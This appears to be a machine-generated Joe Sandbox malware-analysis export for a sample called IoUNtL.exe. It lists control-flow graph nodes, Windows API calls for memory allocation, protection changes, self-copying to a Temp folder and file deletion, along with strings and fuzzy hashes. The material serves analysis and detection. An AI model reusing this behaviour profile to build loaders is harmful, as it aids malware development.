                                                    control_flow_graph 229 f46076-f46079 230 f460e0-f460eb 229->230 231 f4607b-f46080 229->231 234 f460ee-f460f4 230->234 232 f460f7-f460f8 231->232 233 f46082-f46085 231->233 237 f460fe-f46106 232->237 238 f460fa-f460fc call f466c8 232->238 235 f460f6 233->235 236 f46087 233->236 234->235 235->232 236->234 241 f46089-f46095 236->241 239 f46155-f46189 VirtualFree 237->239 240 f46108-f4611d 237->240 238->237 251 f4618c-f46192 239->251 243 f4611f-f46121 240->243 244 f46097-f4609f 241->244 245 f460a1-f460aa 241->245 247 f46151-f46154 243->247 248 f46123 243->248 244->245 249 f460b0-f460c1 VirtualAlloc 245->249 250 f461ba-f461c8 245->250 247->239 248->247 254 f46125-f46128 248->254 255 f460c7-f460cf 249->255 252 f46243-f46251 250->252 253 f461ca-f461d7 250->253 251->255 256 f46198-f461b0 VirtualFree 251->256 261 f46264-f4626f 252->261 262 f46253 252->262 257 f461dd-f461e0 253->257 258 f46134-f4613b 254->258 259 f4612a-f4612e 254->259 255->251 260 f460d5-f460df VirtualAlloc 255->260 256->250 263 f461b2-f461b4 256->263 257->252 265 f461e2-f461f2 257->265 273 f46130-f46132 258->273 274 f4613d-f4614f 258->274 259->258 259->273 260->230 264 f46271-f46276 261->264 268 f46255-f46258 262->268 263->250 270 f4627c-f46289 264->270 271 f46389-f463b1 VirtualProtect 264->271 272 f461f5-f461fe 265->272 268->261 269 f4625a-f46262 268->269 269->268 286 f46292-f46298 270->286 287 f4628b 270->287 277 f463b7-f463ba 271->277 275 f46200-f46203 272->275 276 f4620c-f46219 272->276 273->243 274->243 279 f46205-f46208 275->279 280 f4621b-f46228 275->280 281 f46238-f4623f 276->281 282 f463fc-f46416 VirtualProtect 277->282 283 f463bc-f463c2 277->283 288 f4622a-f46236 279->288 289 f4620a 279->289 280->281 281->272 291 f46241 281->291 284 f46420-f46425 282->284 285 f46418-f4641d 282->285 283->283 290 f463c4 283->290 292 f462a2-f462ac 286->292 287->286 288->281 289->281 290->282 293 f463c6-f463cf 290->293 291->257 294 f462b1-f462c8 292->294 295 f462ae 292->295 296 f463d4-f463d8 293->296 297 f463d1 293->297 298 f46373-f46384 294->298 299 f462ce-f462d4 294->299 295->294 300 f463dd-f463e1 296->300 301 f463da 296->301 297->296 298->264 304 f462d6-f462d9 299->304 305 f462da-f462f1 299->305 302 f463e7-f463fa VirtualProtect 300->302 303 f463e3 300->303 301->300 302->277 302->282 303->302 304->305 307 f46365-f4636e 305->307 308 f462f3-f462f9 305->308 307->292 309 f46314-f46326 308->309 310 f462fb-f4630f 308->310 312 f4634c-f46360 309->312 313 f46328-f4634a 309->313 311 f46426-f464a9 310->311 321 f46519-f4651c 311->321 322 f464ab-f464c0 311->322 312->311 313->307 323 f46583-f46587 321->323 324 f4651d-f4651e 321->324 328 f46535-f46537 322->328 329 f464c2 322->329 326 f46588-f4658b 323->326 327 f46522-f46533 324->327 330 f465a1-f465a3 326->330 331 f4658d-f4658f 326->331 327->328 332 f46539 328->332 333 f4659a 328->333 334 f464c5-f464cd 329->334 335 f464f8 329->335 336 f46591-f46593 331->336 337 f465b4 332->337 338 f4653b-f46541 332->338 339 f4659b-f4659d 333->339 340 f46542-f46545 334->340 341 f464cf-f464d4 334->341 342 f4656c-f4656f 335->342 343 f464fa-f464fe 335->343 336->339 344 f46595 336->344 349 f465be-f465db 337->349 338->340 339->336 345 f4659f 339->345 346 f4654d-f46550 340->346 347 f464d6-f464d9 341->347 348 f46517-f46518 341->348 350 f46572 342->350 343->350 351 f46500 343->351 344->333 345->326 346->349 352 f46552-f46556 346->352 347->346 353 f464db-f464f5 347->353 348->321 354 f465dd-f465f6 349->354 355 f46573-f46576 350->355 351->327 356 f46502 351->356 357 f46578-f4657a 352->357 359 f46558-f46569 352->359 353->335 360 f465f7-f46608 354->360 355->357 356->355 358 f46504-f46513 356->358 357->354 361 f4657c 357->361 358->328 362 f46515 358->362 359->342 361->360 363 f4657e-f4657f 361->363 362->348 363->323
                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 00F460BE
                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00F460DF
                                                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00F46189
                                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00F461A5
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2257122143.0000000000F46000.00000040.00000001.01000000.00000004.sdmp, Offset: 00F40000, based on PE: true
                                                    • Associated: 00000001.00000002.2257040564.0000000000F40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2257061197.0000000000F41000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2257080377.0000000000F43000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2257101802.0000000000F44000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_f40000_IoUNtL.jbxd
                                                    Similarity
                                                    • API ID: Virtual$AllocFree
                                                    • String ID:
                                                    • API String ID: 2087232378-0
                                                    • Opcode ID: d79d43b47ed6a02b4dc6f20f2a7e349952e7a4ca44f6e174d5f2ef9cbb3f40f4
                                                    • Instruction ID: 3c66e91afb2031b8941657dff9215dc762e32b5ad23b2703983b5b429efd6ae7
                                                    • Opcode Fuzzy Hash: d79d43b47ed6a02b4dc6f20f2a7e349952e7a4ca44f6e174d5f2ef9cbb3f40f4
                                                    • Instruction Fuzzy Hash: DB1213B29087859FDB328F64CC45BEA3FA0EF03720F1845AEDC85CB292D674A901D752

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 117 f41973-f4199a PathFileExistsA 118 f41ac7-f41acc 117->118 119 f419a0-f419aa 117->119 121 f41ad0-f41ad5 118->121 122 f41ace 118->122 120 f419af-f419c2 CreateFileA 119->120 125 f419c4-f419d3 Sleep 120->125 126 f41a28-f41a36 GetFileSize 120->126 123 f41ad7-f41ad9 121->123 124 f41af0-f41af6 121->124 122->121 123->124 125->120 127 f419d5-f41a0b call f4185b wsprintfA CopyFileA 125->127 128 f41a87-f41a8b 126->128 129 f41a38-f41a3b 126->129 127->126 143 f41a0d-f41a26 CreateFileA 127->143 130 f41a96-f41a9a 128->130 131 f41a8d-f41a90 FindCloseChangeNotification 128->131 129->128 133 f41a3d-f41a51 VirtualAlloc 129->133 135 f41a9c 130->135 136 f41aad-f41ab1 130->136 131->130 133->128 134 f41a53-f41a57 133->134 138 f41a80 134->138 139 f41a59-f41a6d ReadFile 134->139 140 f41aa0-f41aa7 DeleteFileA 135->140 141 f41ab3-f41ab6 136->141 142 f41adb-f41ae0 136->142 138->128 139->128 144 f41a6f-f41a7e 139->144 140->136 141->118 147 f41ab8-f41ac1 VirtualFree 141->147 145 f41ae7-f41aec 142->145 146 f41ae2-f41ae5 142->146 143->126 148 f41a9e 143->148 144->138 144->139 145->124 149 f41aee 145->149 146->145 147->118 148->140 149->124
                                                    APIs
                                                    • PathFileExistsA.SHLWAPI(00F44E5C,00000000,C:\Users\user\AppData\Local\Temp\IoUNtL.exe), ref: 00F41992
                                                    • CreateFileA.KERNEL32(00F44E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00F419BA
                                                    • Sleep.KERNEL32(00000064), ref: 00F419C6
                                                    • wsprintfA.USER32 ref: 00F419EC
                                                    • CopyFileA.KERNEL32(00F44E5C,?,00000000), ref: 00F41A00
                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F41A1E
                                                    • GetFileSize.KERNEL32(00F44E5C,00000000), ref: 00F41A2C
                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00F41A46
                                                    • ReadFile.KERNEL32(00F44E5C,00F44E60,00000000,?,00000000), ref: 00F41A65
                                                    • FindCloseChangeNotification.KERNEL32(000000FF), ref: 00F41A90
                                                    • DeleteFileA.KERNEL32(?), ref: 00F41AA7
                                                    • VirtualFree.KERNEL32(00F44E60,00000000,00008000), ref: 00F41AC1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2257061197.0000000000F41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F40000, based on PE: true
                                                    • Associated: 00000001.00000002.2257040564.0000000000F40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2257080377.0000000000F43000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2257101802.0000000000F44000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2257122143.0000000000F46000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_f40000_IoUNtL.jbxd
                                                    Similarity
                                                    • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                                                    • String ID: %s%.8X.data$2$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\IoUNtL.exe
                                                    • API String ID: 2523042076-1995926848
                                                    • Opcode ID: ee327a9f26cc63c1a597afe35f897498927306ca11924f4742dcb1e6fd07d2d3
                                                    • Instruction ID: 5d0eb121d87cffbaf97546d89581ec887e277389c1a0e3dcb9420ae40635cd3e
                                                    • Opcode Fuzzy Hash: ee327a9f26cc63c1a597afe35f897498927306ca11924f4742dcb1e6fd07d2d3
                                                    • Instruction Fuzzy Hash: 7E514071D01219EFDF209F98CC84AAEBFB9FB15364F104669F915E6190D3789E80EB50

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 383 f414e1-f414fb 384 f41541-f41547 383->384 385 f414fd-f41510 GetModuleHandleA 383->385 388 f41573-f41574 call f41638 384->388 389 f41549-f4154c 384->389 386 f41512-f41518 385->386 387 f4151a-f41535 VirtualQuery 385->387 386->384 390 f41537-f41539 387->390 391 f4153b 387->391 396 f41579-f4157a ExitProcess 388->396 392 f4154e-f41555 389->392 393 f41569-f41570 389->393 390->384 390->391 391->384 392->393 395 f41557-f41566 call f41af9 392->395 395->393
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00F41504
                                                    • VirtualQuery.KERNEL32(00F414E1,?,0000001C), ref: 00F41525
                                                    • ExitProcess.KERNEL32 ref: 00F4157A
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.2257061197.0000000000F41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F40000, based on PE: true
                                                    • Associated: 00000001.00000002.2257040564.0000000000F40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2257080377.0000000000F43000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2257101802.0000000000F44000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.2257122143.0000000000F46000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_f40000_IoUNtL.jbxd
                                                    Similarity
                                                    • API ID: ExitHandleModuleProcessQueryVirtual
                                                    • String ID:
                                                    • API String ID: 3946701194-0
                                                    • Opcode ID: b1a18e9c8974801ccd42e3dc1b76931fe8bb22c79a5c216a0e439c62503a6280
                                                    • Instruction ID: 3a6a6b082480fd19d8ad69f043c0d34a356ae5f67c66788aece8b2058478748c
                                                    • Opcode Fuzzy Hash: b1a18e9c8974801ccd42e3dc1b76931fe8bb22c79a5c216a0e439c62503a6280
                                                    • Instruction Fuzzy Hash: 22117079D00218DFCB10DFA5A8857BD7BBCFBA5764B14412AFC12E2250D334A981FB50